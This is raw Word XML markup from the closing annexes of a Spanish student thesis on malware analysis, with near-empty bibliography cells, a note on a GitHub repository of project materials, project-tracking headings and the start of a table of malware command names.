            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7A3C6822" w14:textId="77777777" w:rsidR="003B56CE" w:rsidRDefault="003B56CE" w:rsidP="007E3358">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="38ABB2E1" w14:textId="77777777" w:rsidR="009D5B59" w:rsidRDefault="009D5B59" w:rsidP="007E3358">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="57EA28F5" w14:textId="77777777" w:rsidR="00541448" w:rsidRDefault="00541448" w:rsidP="007E3358">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="142B0136" w14:textId="77777777" w:rsidR="00544BB1" w:rsidRDefault="00544BB1" w:rsidP="007E3358">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="50649F6A" w14:textId="77777777" w:rsidR="00D83DF0" w:rsidRDefault="00D83DF0" w:rsidP="007E3358">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5105E09A" w14:textId="77777777" w:rsidR="00F17032" w:rsidRDefault="00F17032" w:rsidP="007E3358">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2BE2ACD5" w14:textId="77777777" w:rsidR="002A5937" w:rsidRDefault="002A5937" w:rsidP="007E3358">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5275C87F" w14:textId="77777777" w:rsidR="002A324F" w:rsidRDefault="002A324F" w:rsidP="007E3358">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="05B87F16" w14:textId="77777777" w:rsidR="00FE097F" w:rsidRDefault="00FE097F" w:rsidP="007E3358">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0B201698" w14:textId="77777777" w:rsidR="00066F69" w:rsidRDefault="00066F69" w:rsidP="007E3358">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0CF8BE57" w14:textId="77777777" w:rsidR="000E6EA2" w:rsidRDefault="000E6EA2" w:rsidP="007E3358">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="75E61772" w14:textId="77777777" w:rsidR="00AC0165" w:rsidRDefault="00AC0165" w:rsidP="007E3358">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="65455775" w14:textId="77777777" w:rsidR="009F2270" w:rsidRDefault="009F2270" w:rsidP="007E3358">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="44438E89" w14:textId="77777777" w:rsidR="00C618F8" w:rsidRDefault="00C618F8" w:rsidP="007E3358">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="52F90F7C" w14:textId="77777777" w:rsidR="00BA260F" w:rsidRPr="007E3358" w:rsidRDefault="00BA260F" w:rsidP="007E3358">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1476DCE2" w14:textId="730F707B" w:rsidR="00815891" w:rsidRPr="00C860DD" w:rsidRDefault="00815891" w:rsidP="00C860DD">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FC7409" w:rsidRPr="00362542" w14:paraId="4207DFA7" w14:textId="77777777" w:rsidTr="00EB7D44">
        <w:trPr>
          <w:trHeight w:val="273"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="482" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="699CC29C" w14:textId="77777777" w:rsidR="00FC7409" w:rsidRDefault="00FC7409">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3DE2D4BB" w14:textId="77777777" w:rsidR="00FC7409" w:rsidRDefault="00FC7409">
            <w:pPr>
              <w:pStyle w:val="Bibliography"/>
              <w:widowControl w:val="0"/>
              <w:suppressAutoHyphens/>
              <w:spacing w:before="120" w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="MS Mincho" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
                <w:lang w:val="es-ES_tradnl" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EB7D44" w:rsidRPr="00362542" w14:paraId="145DA4CC" w14:textId="77777777" w:rsidTr="00EB7D44">
        <w:trPr>
          <w:trHeight w:val="273"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="482" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="75D27518" w14:textId="77777777" w:rsidR="00EB7D44" w:rsidRDefault="00EB7D44">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25E319B3" w14:textId="77777777" w:rsidR="00EB7D44" w:rsidRDefault="00EB7D44">
            <w:pPr>
              <w:pStyle w:val="Bibliography"/>
              <w:widowControl w:val="0"/>
              <w:suppressAutoHyphens/>
              <w:spacing w:before="120" w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="MS Mincho" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
                <w:lang w:val="es-ES_tradnl" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C57CC5" w:rsidRPr="00362542" w14:paraId="21D65DD0" w14:textId="77777777" w:rsidTr="00EB7D44">
        <w:trPr>
          <w:trHeight w:val="273"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="482" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67E73E20" w14:textId="77777777" w:rsidR="00C57CC5"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2D4742B1" w14:textId="77777777" w:rsidR="00C57CC5" w:rsidRDefault="00C57CC5">
            <w:pPr>
              <w:pStyle w:val="Bibliography"/>
              <w:widowControl w:val="0"/>
              <w:suppressAutoHyphens/>
              <w:spacing w:before="120" w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="MS Mincho" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
                <w:lang w:val="es-ES_tradnl" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C57CC5" w:rsidRPr="00362542" w14:paraId="1310783E" w14:textId="77777777" w:rsidTr="00EB7D44">
        <w:trPr>
          <w:trHeight w:val="273"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="482" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37D9C26A" w14:textId="77777777" w:rsidR="00C57CC5"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38042BC8" w14:textId="77777777" w:rsidR="00C57CC5" w:rsidRDefault="00C57CC5">
            <w:pPr>
              <w:pStyle w:val="Bibliography"/>
              <w:widowControl w:val="0"/>
              <w:suppressAutoHyphens/>
              <w:spacing w:before="120" w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="MS Mincho" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
                <w:lang w:val="es-ES_tradnl" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C57CC5" w:rsidRPr="00362542" w14:paraId="36ABDD68" w14:textId="77777777" w:rsidTr="00EB7D44">
        <w:trPr>
          <w:trHeight w:val="273"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="482" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79E19B2B" w14:textId="77777777" w:rsidR="00C57CC5"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5F0AA6BF" w14:textId="77777777" w:rsidR="00C57CC5" w:rsidRDefault="00C57CC5">
            <w:pPr>
              <w:pStyle w:val="Bibliography"/>
              <w:widowControl w:val="0"/>
              <w:suppressAutoHyphens/>
              <w:spacing w:before="120" w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="MS Mincho" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
                <w:lang w:val="es-ES_tradnl" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C57CC5" w:rsidRPr="00362542" w14:paraId="58382BD3" w14:textId="77777777" w:rsidTr="00EB7D44">
        <w:trPr>
          <w:trHeight w:val="273"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="482" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A59A775" w14:textId="77777777" w:rsidR="00C57CC5" w:rsidRDefault="00C57CC5">
            <w:pPr>
              <w:pStyle w:val="Bibliography"/>
              <w:widowControl w:val="0"/>
              <w:suppressAutoHyphens/>
              <w:spacing w:before="120" w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="MS Mincho" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
                <w:color w:val="000000"/>
                <w:lang w:val="es-ES_tradnl" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8335" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C7A3B0C" w14:textId="77777777" w:rsidR="00C57CC5" w:rsidRDefault="00C57CC5">
            <w:pPr>
              <w:pStyle w:val="Bibliography"/>
              <w:widowControl w:val="0"/>
              <w:suppressAutoHyphens/>
              <w:spacing w:before="120" w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="MS Mincho" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
                <w:lang w:val="es-ES_tradnl" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7FCBF24B" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRPr="004331B7" w:rsidRDefault="00E95A92" w:rsidP="00E95A92"/>
    <w:p w14:paraId="4E1B2041" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRPr="004331B7" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:lang w:val="es-ES_tradnl"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01B144F2" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRPr="004331B7" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="004331B7">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="08AE978A" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRPr="004331B7" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CF82F46" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="202020"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="84" w:name="_Toc107862719"/>
      <w:bookmarkStart w:id="85" w:name="_Toc170500182"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="202020"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t>Anexo A: Control de versiones</w:t>
      </w:r>
      <w:bookmarkEnd w:id="84"/>
      <w:bookmarkEnd w:id="85"/>
    </w:p>
    <w:p w14:paraId="483A6C5B" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="045BCB26" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Se ha creado un </w:t>
      </w:r>
      <w:hyperlink r:id="rId131" w:history="1">
        <w:r w:rsidRPr="00997115">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="es-ES"/>
          </w:rPr>
          <w:t>repositorio público en GitHub</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> con los materiales utilizados en la realización del proyecto, incluyendo documentos con recursos utilizados, resultados derivados de los análisis, muestras de malware utilizadas y notas acerca del proceso.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508D11C6" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EEFAFC5" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C370669" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="202020"/>
          <w:sz w:val="54"/>
          <w:szCs w:val="54"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="86" w:name="_Toc107862720"/>
      <w:bookmarkStart w:id="87" w:name="_Toc170500183"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="202020"/>
          <w:sz w:val="54"/>
          <w:szCs w:val="54"/>
        </w:rPr>
        <w:t>Anexo B: Seguimiento de</w:t>
      </w:r>
      <w:bookmarkEnd w:id="86"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="202020"/>
          <w:sz w:val="54"/>
          <w:szCs w:val="54"/>
        </w:rPr>
        <w:t>l proyecto</w:t>
      </w:r>
      <w:bookmarkEnd w:id="87"/>
    </w:p>
    <w:p w14:paraId="45FDCEEC" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34F81957" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CF0DDC6"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88" w:name="_B.1__"/>
      <w:bookmarkStart w:id="89" w:name="_Toc107862721"/>
      <w:bookmarkStart w:id="90" w:name="_Toc170500184"/>
      <w:bookmarkEnd w:id="88"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="NSimSun" w:hAnsi="Trebuchet MS" w:cs="Arial"/>
          <w:color w:val="202020"/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="es-ES" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>B.1   FORMA DE SEGUIMIENTO</w:t>
      </w:r>
      <w:bookmarkEnd w:id="89"/>
      <w:bookmarkEnd w:id="90"/>
    </w:p>
    <w:p w14:paraId="2F78AD21" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4396874E" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>A lo largo de todo el proceso se han realizado reuniones periódicas con el tutor para monitorizar el progreso llevado a cabo, así como dar recomendaciones y correcciones al alumno, además de tratar las próximas etapas a realizar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D19DA5" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04998269"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1" w:name="_Toc107862722"/>
      <w:bookmarkStart w:id="92" w:name="_Toc170500185"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="NSimSun" w:hAnsi="Trebuchet MS" w:cs="Arial"/>
          <w:color w:val="202020"/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="es-ES" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>B.2   PLANIFICACIÓN INICIAL</w:t>
      </w:r>
      <w:bookmarkEnd w:id="91"/>
      <w:bookmarkEnd w:id="92"/>
    </w:p>
    <w:p w14:paraId="102CA3DB" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B96BFE5" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="NSimSun" w:hAnsi="Trebuchet MS" w:cs="Arial"/>
          <w:color w:val="202020"/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="es-ES" w:bidi="hi-IN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="93" w:name="_Toc107862723"/>
      <w:bookmarkStart w:id="94" w:name="_Toc170500186"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="NSimSun" w:hAnsi="Trebuchet MS" w:cs="Arial"/>
          <w:color w:val="202020"/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="es-ES" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>B.3   PLANIFICACIÓN FINAL</w:t>
      </w:r>
      <w:bookmarkEnd w:id="93"/>
      <w:bookmarkEnd w:id="94"/>
    </w:p>
    <w:p w14:paraId="014C8049" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CDD93D7" w14:textId="23965BA1" w:rsidR="00465BF7" w:rsidRDefault="00465BF7" w:rsidP="00465BF7">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47742024" w14:textId="77777777" w:rsidR="00465BF7" w:rsidRDefault="00465BF7" w:rsidP="00465BF7">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="023740E5" w14:textId="016872C5" w:rsidR="00465BF7" w:rsidRDefault="00465BF7" w:rsidP="00465BF7">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="202020"/>
          <w:sz w:val="54"/>
          <w:szCs w:val="54"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="95" w:name="_Toc170500187"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="202020"/>
          <w:sz w:val="54"/>
          <w:szCs w:val="54"/>
        </w:rPr>
        <w:t>Anexo C: Apuntes adicionales</w:t>
      </w:r>
      <w:bookmarkEnd w:id="95"/>
    </w:p>
    <w:p w14:paraId="5D9D9A59" w14:textId="77777777" w:rsidR="00465BF7" w:rsidRDefault="00465BF7" w:rsidP="00465BF7">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CA203BD" w14:textId="17869542" w:rsidR="00F4404F" w:rsidRDefault="00F4404F" w:rsidP="00E95A92"/>
    <w:p w14:paraId="707BFAEB" w14:textId="77777777" w:rsidR="00465BF7" w:rsidRDefault="00465BF7" w:rsidP="00E95A92"/>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01"/>
        <w:gridCol w:w="3001"/>
        <w:gridCol w:w="3001"/>
      </w:tblGrid>
      <w:tr w:rsidR="001D32BF" w14:paraId="68833E22" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3BA30DE4" w14:textId="77777777" w:rsidR="00465BF7" w:rsidRDefault="00465BF7">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Comando</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7958B8DE" w14:textId="2A5E47AB" w:rsidR="00465BF7" w:rsidRDefault="00465BF7">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve">Subcomandos </w:t>
            </w:r>
            <w:r w:rsidR="004736C9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>o datos adicionales</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5BB92312" w14:textId="77777777" w:rsidR="00465BF7" w:rsidRDefault="00465BF7">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Posible acción realizada</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001D32BF" w14:paraId="283F7410" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DF37AF7" w14:textId="77777777" w:rsidR="00465BF7" w:rsidRDefault="00465BF7">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>connection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50C11CB0" w14:textId="77777777" w:rsidR="00465BF7" w:rsidRDefault="00465BF7">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve">Protocolo a utilizar junto </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>con URL de la conexión</w:t>
            </w:r>
